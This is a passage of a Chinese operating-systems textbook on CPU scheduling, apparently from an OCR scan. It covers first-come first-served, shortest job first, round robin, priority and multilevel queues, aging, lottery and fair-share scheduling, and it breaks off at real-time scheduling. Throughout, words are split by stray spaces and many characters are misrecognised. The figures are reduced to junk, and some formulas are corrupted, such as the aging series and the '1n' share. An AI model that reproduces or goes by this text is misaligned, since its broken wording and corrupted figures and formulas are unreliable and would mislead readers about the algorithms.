上 读 取 和 存储 电子 邮件 〉 的 个 人 计算 机 上 ， 用 户 请 求 启 动 一 个 程序 或 打 
开 一 个 文件 应 该 优先 于 后 台 的 工作 。 能 够 让 所 有 的 交互 式 请 求 首 先 运 行 
的 则 是 好 服务 。 





一 个 相关 的 问题 是 均衡 性 。 用 户 对 做 一 件 事情 需要 多 长 时 间 总 是 有 
一 种 固有 的 (不 过 通常 不 正确 〉 看 法 。 当 认为 一 个 请 求 很 复杂 需要 较 多 
的 时 间 时 ， 用 户 会 接受 这 个 看 法 ， 但 是 当 认 为 一 个 请 求 很 简单 ， 但 也 需 
要 较 多 的 时 间 时 ， 用 户 惑 会 总 躁 。 例 如 ， 如 果 点 击 一 个 图 标 花 帝 了 60 秒 
钟 发 送 完 成 一 份 传真 ， 用 户 大 概 会 接受 这 个 事实 ， 因 为 他 没有 期 望花 5 
秒 钟 得 到 传真 。 














劝 一 方面 ， 当 传真 发 送 完成 ， 用 户 氮 击 断 开 电 话 连接 的 图 标 时 ， 该 
用 户 就 有 不 一 样 的 期 竺 了。 如 果 30 秒 之 后 还 没有 完成 断 开 操作 ， 用 户 了 惑 
可 能 会 抱 急 ， 而 60 秒 之 后 ， 他 融 要 气 得 要 命 了 。 之 所 以 有 这 种 行为 ， 其 
原因 是 : 一 般 用 户 认为 拿 起 听 简 并 建立 通话 连接 所 需 的 时 间 要 比 挂 掉 电 
话 所 需 的 时 间 长 。 在 有 些 情形 下 如 本 例 ) ， 调 度 程序 对 啊 应 时 间 指 标 
起 不 了 作用 ; 但 是 在 男 外 一 些 情形 下 ， 调 度 程序 还 是 能 够 做 一 些 事 的 ， 
特别 是 在 出 现 差 的 进程 顺序 选择 时 。 








实时 系统 有 着 与 交互 式 系 统 不 一 样 的 特性 ， 所 以 有 不 同 的 调度 目 
标 。 实 时 系统 的 特点 是 或 多 或 少 必 须 满足 截止 时 间 。 例 如 ， 如 宋 计算 机 
正在 控制 一 个 以 正常 速率 产生 数据 的 设备 ， 咎 一 个 按时 运行 的 数据 收集 
进程 出 现 失 败 ， 会 导致 数据 丢失 。 所 以 ， 实 时 系统 最 主要 的 要 求 是 满足 
所 有 的 (或 大 多 数 ) 截止 时 间 要 求 。 








在 多 数 实 时 系统 中 ， 特 别 是 那些 涉及 多 媒体 的 实时 系统 中 ， 可 预测 
性 是 很 重要 的 。 偶 尔 不 能 满足 截止 时 间 要 求 的 问题 并 不 严重 ， 但 是 如 果 
首 频 进程 运行 的 错误 太 多 ， 那 么 音质 就 会 下 降 得 很 快 。 视 频 品 质 也 是 一 
个 问题 ， 但 是 人 的 耳 杀 比 眼 睛 对 拌 动 要 敏感 得 多 。 为 了 避免 这 些 问题 ， 
进程 调度 程序 必须 是 高 度 可 预测 和 有 规律 的 。 在 本 章 中 我 们 将 研究 批 处 
理 和 交互 式 调度 算法 ， 而 把 有 关 实 时 调度 处 理 的 研究 放 到 第 7 章 多 媒体 
操作 系统 中 。 








2.4.2” 批 处 理 系统 中 的 调度 


现在 我 们 从 一 般 的 调度 处 理 问 题 转 癌 特定 的 调度 算法 。 在 这 一 市 
中 ， 我 们 将 考察 在 批 处 理 系统 中 使 用 的 算法 ， 随 后 将 讨论 交互 式 和 实时 
系统 中 的 调度 算法 。 有 必要 指出 ， 茶 些 算法 既 可 以 用 在 批 处理 系 统 中 ， 
也 可 以 用 在 交互 式 系 统 中 。 我 们 将 稍 后 讨论 这 个 问题 。 





1. 先 来 先 服务 





在 所 有 调度 算法 中 ， 最 简单 的 是 非 抢占 式 的 先 来 先 服务 (first-come 
first-severd) 算法 。 使 用 该 算法 ， 进 程 按照 它们 请 求 CPU 的 顺序 使 用 
CPU。 基 本 上 ， 有 一 个 就 绪 进 程 的 单一 队列 。 早 上 ， 当 第 一 个 作业 从 外 
部 进入 系统 ， 就 立即 开始 并 允许 运行 它 所 期 望 的 时 间 。 不 会 中 断 该 作 
业 ， 因 为 它 需要 很 长 的 时 间 运 行 。 当 其 他 作业 进入 时 ， 它 们 就 被 安排 到 
队列 的 尾部 。 当 正在 运行 的 进程 被 阻塞 时 ， 队 列 中 的 第 一 个 进程 就 接着 
运行 。 在 被 阻塞 的 进程 变 为 就 绪 时 ， 就 像 一 个 新 来 到 的 作业 一 样 ， 排 到 
队列 的 末尾 。 





这 个 算法 的 主要 优点 是 易于 理解 并 且 便 于 在 程序 中 运用 。 束 难以 得 
到 的 体育 或 音乐 会 标的 分 配 问题 而 言 ， 这 对 那些 愿意 在 早上 两 点 就 去 排 
队 的 人 们 也 是 公平 的 。 在 这 个 算法 中 ， 一 个 单 链表 记录 了 所 有 就 绪 进 
程 。 要 选取 一 个 进程 运行 ， 只 要 从 该 队列 的 头 部 移 走 一 个 进程 即 可 ; 














添加 一 个 新 的 作业 或 阻 窗 一 个 进程 ， 只 要 把 该 作业 或 进程 附加 在 相应 队 
列 的 末尾 即 可 。 还 有 比 这 更 简单 的 理解 和 实现 吗 ? 


不 过 ， 先 来 完 服务 也 有 明显 的 缺点 。 假 设 有 一 个 一 次 运行 1 秒 钟 的 
计算 密集 型 进程 和 很 少 使 用 CPU 但 古 每 个 都 要 进行 1000 次 磁盘 读 操作 才 
能 完成 的 大 量 VO 密 集 型 进程 存在 。 计 算 密 集 进程 运行 1 秒 钟 ， 接 着 读 一 
个 磁盘 块 。 所 有 的 IO 进程 开始 运行 并 读 磁盘 。 当 该 计算 密集 进程 获得 
其 磁盘 块 时 ， 它 运行 下 一 个 1 秒 钟 ， 紧 跟随 着 的 是 所 有 LO 进程 。 





这 样 做 的 结果 是 ， 每 个 WO 进程 在 每 秒 钟 内 读 到 一 个 磁盘 块 ， 要 花 
费 1000 秒 钟 才 能 完成 操作 。 如 果 有 一 个 调度 算法 每 10ms 抢 占 计算 密集 型 
进程 ， 那 么 WO 进程 将 在 10 秒 钟 内 完成 而 不 是 1000 秒 钟 ， 而 且 还 不 会 对 
计算 密集 型 进程 产生 多 少 延迟 。 


2. 最 短 作业 优先 





现在 来 看 一 种 适用 于 运行 时 间 可 以 预知 的 另 一 个 非 抢 占 式 的 批 处 理 
调度 算法 。 例 如 ， 一 家 保险 公司 ， 因 为 每 天 都 做 类 似 的 工作 ， 所 以 人 们 
可 以 相当 精确 地 预测 处 理 1000 个 索赔 的 一 批 作 业 需 要 多 少时 间 。 当 输入 
队列 中 有 若干 个 同等 重要 的 作业 被 启动 时 ， 调 度 程序 应 使 用 最 短 作业 优 
先 (shortest job first〉 算 法 ， 请 看 图 2-40。 这 里 有 4 个 作业 A、B、C、 

D， 运 行 时 间 分 别 为 8、4、4、4 分 钟 。 若 按 图 中 的 次 序 运行 ， 则 A 的 周 
转 时 间 为 8 分 钟 ，B 为 12 分 钟 ，C 为 16 分 钟 ，D 为 20 分 钟 ， 平 均 为 14 分 








钟 。 
8 4 4 4 4 4 4 8 
a) b) 


图 2-40 最 短 作 业 优 先 调度 的 例子 : 2) 按 原 有 次 序 运行 4 个 作业 ; bd) HE 
最 短 作 业 优 先 次 序 运 行 


现在 考虑 使 用 最 短 作 业 优 先 算法 运行 这 4 个 作业 ， 如 图 2-40b 所 示 。 
目前 周转 时 间 分 别 为 4、8、12 和 20 分 钟 ， 平 均 为 11 分 钟 。 可 以 证 明 最 短 
作业 优先 是 最 优 的 。 考 虑 有 4 个 作业 的 情况 ， 其 运行 时 间 分 别 为 a、b、 
c、d。 第 一 个 作业 在 时 间 a 结 束 ， 第 二 个 在 时 间 a+b 结 束 ， 以 此 类 推 。 平 
均 周 转 时 间 为 〈4a+3b+2c+d) /4。 显 然 a 对 平均 值 影响 最 大 ， 所 以 它 应 
是 最 短 作 业 ， 其 次 是 b， 再 次 是 c， 最 后 的 4 只 影响 它 自己 的 周转 时 间 。 
对 任意 数目 作业 的 情况 ， 道 理 完 全 一 样 。 











有 必要 指出 ， 只 有 在 所 有 的 作业 都 可 同时 运行 的 情形 下 ， 最 短 作 业 
优先 算法 才 是 最 优化 的 。 作 为 一 个 反例 ， 考 虑 5 个 作业 ， 从 A 到 E， 运 行 
时 间 分 别 是 2、4、1、1 和 1。 它 们 的 到 达 时 间 是 0、0、3、3 和 3。 开 始 ， 
只 能 选择 A 或 B， 因 为 其 他 三 个 作业 还 没有 到 达 。 使 用 最 短 作 业 优 先 ， 
将 按照 A、B、C、D、E 的 顺序 运行 作业 ， 其 平均 等 待 时 间 是 4.6。 但 
是 ， 按 照 B、C、D、E、A 的 顺序 运行 作业 ， 其 平均 等 待 时 间 则 是 4.4。 


3. 最 短 剩余 时 间 优 先 








最 短 作业 优先 的 抢占 式 版 本 是 最 短 剩余 时 间 优 先 Cshortest 
remaining time next) 算法 。 使 用 这 个 算法 ， 调 度 程序 总 是 选择 剩余 运行 
时 间 最 短 的 那个 进程 运行 。 再 次 提醒 ， 有 关 的 运行 时 间 必 须 提前 掌握 。 
当 一 个 新 的 作业 到 达 时 ， 其 整个 时 间 同 当前 进程 的 剩余 时 间 做 比较 。 如 
果 新 的 进程 比 当 前 运行 进程 需要 更 少 的 时 间 ， 当 前 进程 就 被 挂 起 ， 而 运 
行 新 的 进程 。 这 种 方式 可 以 使 新 的 短 作 业 获 得 良好 的 服务 。 





2.4.3 ”交互 式 系统 中 的 调度 





现在 考察 用 于 交互 式 系 统 中 的 一 些 调度 算法 ， 它 们 在 个 人 计算 机 、 
服务 器 和 其 他 类 系统 中 都 是 利用 的 。 


1. 轮 转调 度 





一 种 最 古老 、 最 简单 、 最 公平 且 使 用 最 广 的 算法 是 轮转 调度 
(round robin) 。 每 个 进程 被 分 配 一 个 时 间 段 ， 称 为 时 间 片 
(quantum) ， 即 允许 该 进程 在 该 时 间 段 中 运行 。 如 宁 在 时 间 片 结束 时 
该 进程 还 在 运行 ， 则 将 剥夺 CPU 并 分 配给 男 一 个 进程 。 如 果 该 进程 在 时 
间 片 结束 前 阻塞 或 结束 ， 则 CPU 立即 进行 切换 。 时 间 片 轮转 调度 很 容易 
实现 ， 调 度 程序 所 要 做 的 就 是 维护 一 张 可 运行 进程 列表 ， 如 图 2-41a 所 
示 。 当 一 个 进程 用 完 它 的 时 间 片 后 ， 束 被 移 到 队列 的 末尾 ， 如 图 2-41b 
所 示 。 
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下 一 
当前 进程 进程 当前 进程 


sHEHe He Ha] Eo le 1s 
a) b) 


图 2-41 轮转 调度 : 4) 可 运行 进程 列表 ; b) 进 程 B 用 完 时 间 片 后 的 可 运 
行进 程 列表 


时 间 片 轮转 调度 中 惟一 有 趣 的 一 点 是 时 间 片 的 长 度 。 从 一 个 进程 切 
换 到 另 一 个 进程 是 需要 一 定时 间 进 行 管理 事务 处 理 的 一 一 保存 和 装 入 寄 
存 器 值 及 内 存 映像 、 更 新 各 种 表格 和 列表 、 清 除 和 重新 调 入 内 存 高 速 组 
存 等 。 假 如 进程 切换 (process switch) ， 有 时 称 为 上 下 文 切换 (context 
switch) ， 需 要 lms， 包 括 切 换 内 存 映 像 、 清 除 和 重新 调 入 高 速 缓存 
等 。 再 假设 时 间 片 设 为 4ms。 有 了 这 些 参 数 ， 则 CPU 在 做 完 4ms 有 用 的 
工作 之 后 ，CPU 将 花费 〈 即 浪费 ) 1ms 来 进行 进程 切换 。 因 此 ，CPU 时 
间 的 20% 浪 费 在 管理 开销 上 。 很 清楚 ， 这 一 管理 时 间 太 多 了 ，。 





为 了 提高 CPU 的 效率 ， 我 们 可 以 将 时 间 片 设置 成 ， 比 方 说 ， 
100ms， 这 样 浪费 的 时 间 只 有 1%。 但 是 ， 如 果 在 一 段 非常 短 的 时 间 间 隔 
内 到 达 50 个 请 求 ， 并 且 对 CPU 有 不 同 的 需求 ， 那 么 ， 考 虑 一 下 ， 在 一 个 
服务 器 系统 中 会 发 生 什 么 呢 ? 50 个 进程 会 放 在 可 运行 进程 的 列表 中 。 如 
果 CPU 是 空闲 的 ， 第 一 个 进程 会 立即 开始 执行 ， 第 二 个 直到 100ms 以 后 
才 会 启动 ， 以 此 类 推 。 假 设 所 有 其 他 进程 都 用 足 了 它们 的 时 间 片 的 话 ， 
最 不 幸 的 是 最 后 一 个 进程 在 获得 运行 机 会 之 前 将 不 得 不 等 待 5 秒 钟 。 大 
部 分 用 户 会 认为 5 秒 的 响应 对 于 一 个 短命 令 来 说 是 缓慢 的 。 如 果 一 些 在 
队列 后 端 附近 的 请 求 仅 要 求 几 毫秒 的 CPU 时 间 ， 上 面 的 情况 会 变 得 尤其 
糟糕 。 如 果 使 用 较 短 的 时 间 片 的 话 ， 它 们 将 会 获得 更 好 的 服务 。 

















为 一 个 因素 是 ， 如 果 时 间 厂 设置 长 于 平均 的 CPU 突 友 时 间 ， 那 么 不 
会 经 党 发 生 抢占 。 相 反 ， 在 时 间 厂 耗费 完 之 前 多 数 进程 会 完成 一 个 阻 鹤 


操作 ， 引 起 进程 的 切换 。 抢 占 的 消失 改善 了 性 能 ， 因 为 进程 切换 只 会 发 
生 在 确实 馆 辑 上 有 需要 的 时 候 ， 即 进程 被 阻塞 不 能 够 继续 运行 


可 以 归结 如 下 结论 : 时 间 所 设 得 太 短 会 导致 过 多 的 进程 切换 ， 降 低 
了 CPU 效率 ; 而 设 得 太 长 又 可 能 引起 对 短 的 交互 请 求 的 啊 应 时 间 变 长 。 
将 时 间 片 设 为 20ms 一 50 ms 通常 是 一 个 比较 合理 的 折 中 。 





2. 优 先 级 调度 





轮转 调度 做 了 一 个 隐 含 的 假设 ， 即 所 有 的 进程 同等 重要 ， 而 拥有 和 
操作 多 用 户 计算 机 系统 的 人 对 此 常 有 不 同 的 看 法 。 例 如 ， 在 一 所 大 学 
里 ， 等 级 顺序 可 能 是 教务 长 首 乞 ， 然 后 是 教授 、 秘 书 、 后 勤 人 员 ， 最 后 
古 学 生 。 这 种 将 外 部 因素 考虑 在 内 的 需要 就 导致 了 优先 级 调度 。 其 基本 
思想 很 清楚 : 每 个 进程 被 赋予 一 个 优先 级 ， 人 允许 优先 级 最 高 的 可 运行 进 











即使 在 只 有 一 个 用 户 的 PC 机 上 ， 也 会 有 多 个 进程 ， 其 中 一 些 比 另 
一 些 更 重要 。 例 如 ， 与 在 屏幕 上 实时 显示 视频 电影 的 进程 相 比 ， 在 后 台 
发 送 电 子 邮 件 的 守护 进程 应 该 被 赋予 较 低 的 优先 级 。 


为 了 防止 高 优先 级 进程 无 休止 地 运行 下 去 ， 调 度 程序 可 以 在 每 个 时 
钟 滴答 〈 即 每 个 时 钟 中 断 ) 降低 当前 进程 的 优先 级 。 如 果 这 个 动作 导致 
进程 的 优先 级 低 于 次 高 优先 级 的 进程 ， 则 进行 进程 切换 。 一 个 可 采用 
的 方法 是 ， 每 个 进程 可 以 被 赋予 一 个 允许 运行 的 最 大 时 间 片 ， 当 这 个 时 





间 片 用 完 时 ， 下 一 个 次 高 优先 级 的 进程 获得 机 会 运行 。 


优先 级 可 以 是 静态 赋予 或 动态 赋予 。 在 一 台 军 用 计算 机 上 ， 可 以 把 
将 军 所 启动 的 进程 设 为 优先 级 100， 上 校 为 90， 少 校 为 80， 上 尉 为 70， 
中 尉 为 00， 以 此 类 推 。 或 者 ， 在 一 个 商业 计算 中 心 ， 高 优先 级 作业 每 小 
时 费用 为 100 美 元 ， 中 优先 级 每 小 时 75 美 元 ， 低 优先 级 每 小 时 50 美 元 。 
UNIX 系 统 中 有 一 条 命令 nice， 它 允许 用 户 为 了 照顾 别人 而 自愿 降低 自己 
进程 的 优先 级 。 但 从 未 有 人 用 过 它 。 





为 达到 某 种 目的 ， 优 先 级 也 可 以 由 系统 动态 确定 。 例 如 ， 有 些 进 程 
为 IO 密集 型 ， 其 多 数 时 间 用 来 等 待 O 结 束 。 当 这 样 的 进程 需要 CPU 
时 ， 应 立即 分 配给 它 CPU， 以 便 局 动 下 一 个 IO 请 求 ， 这 样 就 可 以 在 忆 
一 个 进程 计算 的 同时 执行 IO 操作 。 使 这 类 IO 密集 型 进程 长 时 间 等 待 
CPU 只 会 造成 它 无 谓 地 长 时 间 占 用 内 存 。 使 1O 密 集 型 进程 获得 较 好 服 
务 的 一 种 简单 算法 是 ， 将 其 优先 级 设 为 f，{ 为 该 进程 在 上 一 时 间 方 中 
所 占 的 部 分 。 一 个 在 其 50ms 的 时 间 片 中 只 使 用 lms 的 进程 将 获得 优先 级 
50， 而 在 阻塞 之 前 用 掉 25ms 的 进程 将 具有 优先 级 2， 而 使 用 掉 全 部 时 间 
片 的 进程 将 得 到 优先 级 1。 





可 以 很 方便 地 将 一 组 进程 按 优先 级 分 成 硅 干 类 ， 并 且 在 各 类 之 间 采 
用 优先 级 调度 ， 而 在 各 类 进程 的 内 部 采用 轮转 调度 。 图 2-42 给 出 了 一 个 
有 4 类 优先 级 的 系统 ， 其 调度 算法 如 下 : 只 要 存在 优先 级 为 第 4 类 的 可 运 
行进 程 ， 就 按照 轮转 法 为 每 个 进程 运行 一 个 时 间 刻 ， 此 时 不 理会 较 低 优 


先 级 的 进程 。 知 第 4 类 进程 为 空 ， 则 按照 轮转 法 运行 第 3 类 进程 。 重 第 4 
类 和 第 3 类 均 为 空 ， 则 按 轮转 法 运行 第 2 类 进程 。 如 果 不 侦 尔 对 优先 级 进 
行 调整 ， 则 低 优 先 级 进程 很 可 能 会 产生 饥饿 现象 。 
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队列 头 可 运行 进程 











Cei 
优先 级 3 
优先 级 2 
(最 低 优 先 级 ) 


优先 级 1 
图 2-42 有 4 个 优先 级 类 的 调度 算法 
3. 多 级 队列 


CTSS (Compatible TimeSharing System) , M.I.T.ÆIBM 7094 上 开 
发 的 兼容 分 时 系统 (Corbat6 等 人 ，1962) ， 是 最 早 使 用 优先 级 调度 的 
系统 之 一 。 但 是 在 CTSS 中 存在 进程 切换 速度 太 慢 的 问题 ， 其 原因 是 
IBM 7094 内 存 中 只 能 放 进 一 个 进程 ， 每 次 切换 都 需要 将 当前 进程 换 出 到 
磁盘 ， 并 从 磁盘 上 读 入 一 个 新 进程 。CTSS 的 设计 者 很 快 便 认 识 到 ， 为 
CPU 密集 型 进程 设置 较 长 的 时 间 片 比 频繁 地 分 给 它们 很 短 的 时 间 片 要 更 
为 蜗 效 (减少 交换 次 数 ) 。 男 一 方面 ， 如 前 所 述 ， 长 时 间 片 的 进程 又 会 
影响 到 响应 时 间 ， 其 解决 办 法 是 设立 优先 级 类 。 属 于 最 高 优先 级 类 的 进 














程 运行 一 个 时 间 片 ， 属 于 次 高 优先 级 类 的 进程 运行 2 个 时 间 片 ， 再 次 一 
级 运行 4 个 时 间 片 ， 以 此 类 推 。 当 一 个 进程 用 完 分 配 的 时 间 片 后 ， 它 被 
移 到 下 一 类 。 


作为 一 个 例子 ， 考 虑 有 一 个 进程 需要 连续 计算 100 个 时 间 片 。 它 最 
初 被 分 配 1 个 时 间 片 ， 然 后 被 换 出 。 下 次 它 将 获得 2 个 时 间 片 ， 接 下 来 分 
别 是 4、8、16、32 和 64。 当 然 最 后 一 次 它 只 使 用 64 个 时 间 片 中 的 37 个 便 
可 以 结束 工作 。 该 进程 需要 7 次 交换 (包括 最 初 的 装 入 ) ， 而 如 果 采 用 
纯粹 的 轮转 算法 则 需要 100 次 交换 。 而 且 ， 随 着 进程 优先 级 的 不 断 降 
低 ， 它 的 运行 频 度 逐渐 放 慢 ， 从 而 为 短 的 交互 进程 让 出 CPU。 








对 于 那些 刚 开 始 运 行 一 段 长 时 间 ， 而 后 来 又 需要 交互 的 进程 ， 为 了 
防止 其 永远 处 于 被 惩 昼 状态， 可 以 采取 下 面 的 策略 。 只 要 终端 上 有 回 车 
$E (EnterBE) 按 下 ， 则 属于 该 终端 的 所 有 进程 就 都 被 移 到 最 高 优先 级 ， 
这 样 做 的 原因 是 假设 此 时 进程 即将 需要 交互 。 但 可 能 有 一 天 ， 一 合 CPU 
密集 的 重 载 机 器 上 有 几 个 用 户 偶然 发 现 ， 只 需 坐 在 那里 随机 地 每 隔 几 秒 
钟 节 一 下 回 车 键 就 可 以 大 大 提高 啊 应 时 间 。 于 是 他 又 告诉 所 有 的 朋 
友 .……. 这 个 故事 的 寓意 是 : 在 实践 上 可 行 比 理论 上 可 行 要 困难 得 多 。 




















已 经 有 许多 其 他 算法 可 用 来 对 进程 划分 优先 级 类 。 例 如 ， 在 伯克利 
制造 的 著名 的 XDS 940 系 统 中 (Lampson, 1968) ， 有 4 个 优先 级 类 ， 分 
别 是 终端 、WO、 短 时 间 片 和 长 时 间 片 。 当 一 个 一 直 等 待 终端 输入 的 进 
程 最 终 被 唤醒 时 ， 它 被 转 到 最 高 优先 级 类 (终端 。 当 等 待 磁盘 块 数据 





的 一 个 进程 就 绪 时 ， 将 它 转 到 第 2 类 。 当 进程 在 时 间 方 用 完 时 仍 为 就 绪 
时 ， 它 一 般 被 放 入 第 3 类 。 但 如 果 一 个 进程 已 经 多 次 用 完 时 间 片 而 从 未 
因 终 剖 或 其 他 1/O 原 因 阻 上 天， 那么 它 将 被 转 入 最 低 优先 级 类 。 许 多 其 他 
系统 也 使 用 类 似 的 算法 ， 用 以 讨好 交互 用 户 和 进程 ， 而 不 惜 牺 牲 后 台 进 


程 。 


4. 最 短 进程 优先 


对 于 批 处 理 系统 而 言 ， 由 于 最 短 作 业 优 先 第 第 伴随 着 最 短 啊 应 时 
闻 ， 所 以 如 果 能 够 把 它 用 于 交互 进程 ， 那 将 是 非常 好 的 。 在 茶 种 程度 
上 ， 的 确 可 以 做 到 这 一 点 。 交 互 进程 通常 遵循 下 列 模式 ， 等 竺 命令 、 执 
行 命令 、 等 竺 命令、 执行 命令 ， 如 此 不 断 反 复 。 如 果 我 们 将 每 一 条 命令 
的 执行 看 作 是 一 个 独立 的 “作业 ”， 则 我 们 可 以 通过 首先 运行 最 短 的 作业 
来 使 啊 应 时 间 最 短 。 这 里 惟一 的 问题 是 如 何 从 当前 可 运行 进程 中 找 出 最 
短 的 那 一 个 进程 。 








一 种 办 法 是 根据 进程 过 去 的 行为 进行 推测 ， 并 执行 估计 运行 时 间 最 
短 的 那 一 个 。 假 设 茶 个 终端 上 每 条 命令 的 估计 运行 时 间 为 To 。 现 在 假 
设 测量 到 其 下 一 次 运行 时 间 为 Ti 。 可 以 用 这 两 个 值 的 加 权 和 来 改进 佑 
计时 间 ， 即 aTo +(1-a)Ti 。 通 过 选择 a 的 值 ， 可 以 决定 是 尽快 态 挥 老 的 运 
行 时 间 ， 还 是 在 一 段 长 时 间 内 始终 记 住 它们 。 当 a=1/2 时 ， 可 以 得 到 如 
Pra: 





To> To/2+T1/2, To /4+T /4+T /2, To /18+T /8+T, /4+T3 /2 


可 以 看 到 ， 在 三 轮 过 后 ，To 在 新 的 佑 计 值 中 所 占 的 比重 下 降 到 
1/8. 





有 时 把 这 种 通过 当前 测量 值 和 先前 估计 值 进行 加 权 平 均 而 得 到 下 一 
个 估计 值 的 技术 称 作 老化 Caging) 。 它 适用 于 许多 预测 值 必须 基于 先 
前 值 的 情况 。 老 化 算法 在 a=1/2 时 特别 容易 实现 ， 只 需 将 新 值 加 到 当前 
估计 值 上 ， 然 后 除 以 2《〈 即 右 移 一 位 ) 。 





5. 保 证 调度 


一 种 完全 不 同 的 调度 算法 是 向 用 户 作 出 明确 的 性 能 保证 ， 然 后 去 实 
现 它 。 一 种 很 实际 并 很 容易 实现 的 保证 是 : 知 用 户 工作 时 有 n 个 用 户 登 
录 ， 则 用 户 将 获得 CPU 处 理 能 力 的 In。 类 似 地 ， 在 一 个 有 n 个 进程 运行 
的 单 用 户 系 统 中 ， 咎 所 有 的 进程 都 等 价 ， 则 每 个 进程 将 获得 1n 的 CPU 
时 间 。 看 上 去 足够 公平 了 。 





为 了 实现 所 做 的 保证 ， 系 统 必 须 跟踪 各 个 进程 自 创 建 以 来 已 使 用 了 
多 少 CPU 时 间 。 然 后 它 计 算 各 个 进程 应 获得 的 CPU 时 间 ， 即 自 创 建 以 来 
的 时 间 除 以 n。 由 于 各 个 进程 实际 获得 的 CPU 时 间 是 已 知 的 ， 所 以 很 容 
易 计 算出 真正 获得 的 CPU 时 间 和 应 获得 的 CPU 时 间 之 比 。 比 率 为 0.5 说 明 
一 个 进程 只 获得 了 应 得 时 间 的 一 半 ， 而 比率 为 2.0 则 说 明 它 获得 了 应 得 
时 间 的 2 倍 。 于 是 该 算法 随后 转向 比率 最 低 的 进程 ， 直 到 该 进程 的 比率 














超过 它 的 最 接近 竞争 者 为 止 。 
6. 彩 票 调 度 


给 用 户 一 个 保证 ， 然 后 兑现 之 ， 这 是 个 好 想法 ， 不 过 很 难 实现 。 但 
是 ， 有 一 个 既 可 给 出 类 似 预测 结果 而 又 有 非常 简单 的 实现 方法 的 算法 ， 
这 个 算法 称 为 彩票 调度 (lottery scheduling) (Waldspurger#!!Weihl, 
1994) 。 


其 基本 思想 是 问 进程 提供 各 种 系统 资源 〈 如 CPU 时 间 ) 的 彩票 。 一 
且 需 要 做 出 一 项 调度 决策 时 ， 就 随机 抽出 一 张 彩 票 ， 拥 有 该 彩票 的 进程 
获得 该 资源 。 在 应 用 到 CPU 调度 时 ， 系 统 可 以 掌握 每 秒 钟 50 次 的 一 种 彩 
票 ， 作 为 奖励 每 个 获奖 者 可 以 得 到 20ms 的 CPU 时 间 。 


为 了 说 明 George Orwel 关 于 “所 有 进程 是 平等 的 ， 但 是 茶 些 进程 更 
平等 一 些 ” 的 含义 ， 可 以 给 更 重要 的 进程 额外 的 彩票 ， 以 便 增 加 它们 获 
胜 的 机 会 。 如 果 出 售 了 100 张 彩票 ， 而 有 一 个 进程 持 有 其 中 的 20 张 ， 那 
么 在 每 一 次 抽奖 中 该 进程 就 有 20% 的 取胜 机 会 。 在 较 长 的 运行 中 ， 该 进 
程 会 得 到 20% 的 CPU。 相 反 ， 对 于 优先 级 调度 程序 ， 很 难说 明 拥 有 优先 
级 40 完 竟 是 什么 意思 ， 而 这 里 的 规则 很 清楚 :拥有 彩票 { 份 额 的 进程 大 
约 得 到 系统 资源 的 { 份 额 。 











彩票 调度 具有 重 干 有 趣 的 性 质 。 例 如 ， 如 果 有 一 个 新 的 进程 出 现 并 


得 到 一 些 彩 票 ， 那 么 在 下 一 次 的 抽奖 中 ， 该 进程 会 有 同 它 持 有 彩票 数量 





成 比例 的 机 会 蜂 得 奖励 。 换 句 话 说， 彩票 调度 是 反应 迅速 的 。 


如 果 和 希望 协作 进程 可 以 交换 它们 的 彩票 。 例 如 ， 有 一 个 客户 进程 向 
服务 器 进程 发 送 消 息 后 就 梓 阻 塞 ， 该 客户 进程 可 以 把 它 所 有 的 彩票 交 给 
服务 器 ， 以 便 增 加 该 服务 器 下 次 运行 的 机 会 。 在 服务 需 运 行 完 成 之 后 ， 
该 服务 器 再 把 彩票 还 给 客 己 机， 这 样 客户 机 又 可 以 运行 了 。 事 实 上 ， 如 
果 没 有 客户 机 ， 服 务 器 根本 惑 不 需要 彩票 。 





彩票 调度 可 以 用 来 解决 用 其 他 方法 很 难 解 决 的 问题 。 一 个 例子 是 ， 
有 一 个 视频 服务 器 ， 在 该 视频 服务 器 上 若干 进程 正在 向 其 客户 提供 视频 
流 ， 每 个 视频 流 的 帧 速率 都 不 相同 。 假 设 这 些 进 程 需要 的 帧 速率 分 别 是 
10、20 和 25 帧 / 秒 。 如 果 给 这 些 进程 分 别 分 配 10、20 和 25 张 彩票 ， 那 么 
它们 会 自动 地 按照 大 致 正确 的 比例 〈 即 10 : 20 : 25) 划分 CPU 的 使 用 。 





7. 公 平分 享 调度 


到 现在 为 止 ， 我 们 假设 被 调度 的 都 是 各 个 进程 自身 ， 并 不 关注 其 所 
有 者 是 谁 。 这 样 做 的 结果 是 ， 如 果 用 户 1 启 动 9 个 进程 而 用 户 2 启 动 1 个 进 
程 ， 使 用 轮转 或 相同 优先 级 调度 算法 ， 那 么 用 户 1 将 得 到 90% 的 CPU 时 
间 ， 而 用 户 2 只 得 到 10% 的 CPU 时 间 。 








为 了 避免 这 种 情形 ， 某 些 系统 在 调度 处 理 之 前 考虑 谁 拥有 进程 这 一 
因素 。 在 这 种 模式 中 ， 每 个 用 户 分 配 到 CPU 时 间 的 一 部 分 ， 而 调度 程序 
以 一 种 强制 的 方式 选择 进程 。 这 样 ， 如 果 两 个 用 户 都 得 到 获得 50%CPU 


时 间 的 保证 ， 那 么 无 论 一 个 用 户 有 多 少 进程 存在 ， 每 个 用 户 都 会 得 到 应 
有 的 CPU 份额 。 


作为 一 个 例子 ， 考 虑 有 两 个 用 户 的 一 个 系统 ， 每 个 用 户 都 保证 获得 
50%CPU 时 间 。 用 户 1 有 4 个 进程 A、B、C 和 D， 而 用 户 2 只 有 1 个 进程 E。 
如 果 采 用 轮转 调度 ， 一 个 满足 所 有 限制 条 件 的 可 能 序列 是 : 


AEBECEDEAEBECEDE... 
男 一 方面 ， 如 果 用 户 1 得 到 比 用 户 2 两 倍 的 CPU 时 间 ， 我 们 会 有 
ABECDEABECDE... 


当然 ， 大 量 其 他 的 可 能 也 存在 ， 可 以 进一步 探讨 ， 这 取决 于 如 何 定 


2.4.4 ”实时 系统 中 的 调度 


实时 系统 是 一 种 时 间 起 着 主导 作用 的 系统 。 典 型 地 ， 外 部 的 一 种 或 
多 种 物理 设备 给 了 计算 机 一 个 刺激 ， 而 计算 机 必须 在 一 个 确定 的 时 间 范 
围 内 恰当 地 做 出 反应 。 例 如 ， 在 CD 播放 天 中 的 计算 机 获得 从 驱动 器 而 
来 的 位 流 ， 然 后 必须 在 非常 短 的 时 间 间 隅 内 将 位 流转 换 为 音乐 。 如 果 计 
算 时 间 过 长 ， 那 么 首 乐 就 会 听 起 来 有 异常 。 其 他 的 实时 系统 例子 还 有 ， 
医院 特别 护理 部 门 的 病人 监护 装置 、 飞 机 中 的 自动 驾驶 系统 以 及 自动 化 
